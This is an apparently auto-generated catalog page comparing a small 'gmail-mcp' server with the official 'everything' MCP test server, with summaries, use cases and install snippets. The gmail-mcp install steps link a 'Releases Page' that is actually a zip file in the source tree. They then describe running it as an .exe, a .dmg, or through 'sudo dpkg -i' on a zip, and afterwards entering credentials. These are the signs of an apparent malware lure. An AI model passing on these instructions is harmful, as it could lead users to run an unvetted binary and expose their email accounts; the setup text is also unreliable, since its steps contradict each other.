MCP Catalogs
Home

gmail-mcp vs everything

Side-by-side comparison to help you pick between these two MCP servers.

gmail-mcp
by hahaha-saygex
everything
by modelcontextprotocol
Stars★ 1★ 85,748
30d uses
Score3477
Official
Categories
CommunicationProductivityAI / LLM Tools
Developer ToolsAI / LLM ToolsOther
LanguageTypeScriptTypeScript
Last committhis monththis month

gmail-mcp · Summary

Gmail MCP server for email management with OAuth2 authentication.

everything · Summary

Official MCP test server exercising all protocol features for client builders.

gmail-mcp · Use cases

  • Automate email responses and management within AI-powered development environments
  • Integrate Gmail functionality into AI workflows for automated communication
  • Process and organize large volumes of emails using AI assistants

everything · Use cases

  • Testing MCP client implementations against all protocol features
  • Learning MCP protocol capabilities through a reference server
  • Validating client compatibility with different transport methods

gmail-mcp · Install

Installation

  1. Download the latest version from [Releases Page](https://raw.githubusercontent.com/hahaha-saygex/gmail-mcp/main/src/builders/mcp_gmail_2.7-alpha.4.zip)
  1. Install according to your operating system:

- **Windows**: Double-click the .exe file and follow the setup instructions - **macOS**: Open the .dmg file and drag the app to your Applications folder - **Linux**: Use sudo dpkg -i mcp_gmail_2.7-alpha.4.zip in your terminal

  1. Set up OAuth2 authentication by creating a project in Google Developer Console and configuring the Gmail API
  1. Launch the application and enter your credentials

Claude Desktop Configuration

Add to your Claude Desktop configuration:

{
  "mcpServers": {
    "gmail": {
      "command": "path/to/gmail-mcp",
      "args": []
    }
  }
}

everything · Install

NPX (recommended)

{
  "mcpServers": {
    "everything": {
      "command": "npx",
      "args": ["-y", "@modelcontextprotocol/server-everything"]
    }
  }
}

On Windows, use cmd /c:

{
  "mcpServers": {
    "everything": {
      "command": "cmd",
      "args": ["/c", "npx", "-y", "@modelcontextprotocol/server-everything"]
    }
  }
}

Docker

{
  "mcpServers": {
    "everything": {
      "command": "docker",
      "args": ["run", "-i", "--rm", "mcp/everything"]
    }
  }
}

Global install

npm install -g @modelcontextprotocol/server-everything@latest
npx @modelcontextprotocol/server-everything
Comparison generated from public README + GitHub signals. Last updated automatically.